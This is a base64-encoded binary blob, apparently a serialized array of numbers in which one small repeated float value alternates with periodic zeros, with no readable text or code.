iU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fi